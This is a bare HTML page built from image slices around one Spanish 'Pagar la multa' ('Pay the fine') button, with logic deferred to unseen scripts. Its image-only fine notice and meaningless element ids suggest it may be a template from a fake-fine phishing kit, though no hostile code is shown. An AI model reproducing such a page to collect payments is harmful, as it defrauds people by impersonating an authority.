<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/brito.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    
    
        <div>
            <div class="topano">
                <div class="topano">
                    <img class="topo-mb" src="./img/tripot1.PNG" alt="">
                    <img class="topo-pc" src="./img/topan-mb-01.png" alt="">
                </div>
            </div>
        
        
            <div class="container">
                <div class="container">
          
          
            
                    
                        <div class="botn">
                            <img class="mid-pc" src="./img/mid001.png" alt="">
                            <img class="mid-mb" src="./img/mid1.PNG" alt="">
                            
                            <img class="mid-02" src="./img/mid2.PNG" alt="">
                            <button class="btn btn-pc"  id="barinxri" type="button">Pagar la multa</button>
                        </div>
                            
                        
                        
        
                        
                    
                        
                   
                   
                    
                  </div>
            </div>
        </div>
        </div>

    <div class="botano">
        <img class="topo-mb" src="./img/botano1.png" alt="">
        <img class="topo-pc" src="./img/botano-mb-01.jpg" alt="">
    </div>

   
    <script src="./js/stb.js"></script>
    <script src="./js/inp.js"></script>
    <script>
        
    </script>
</body>
</html>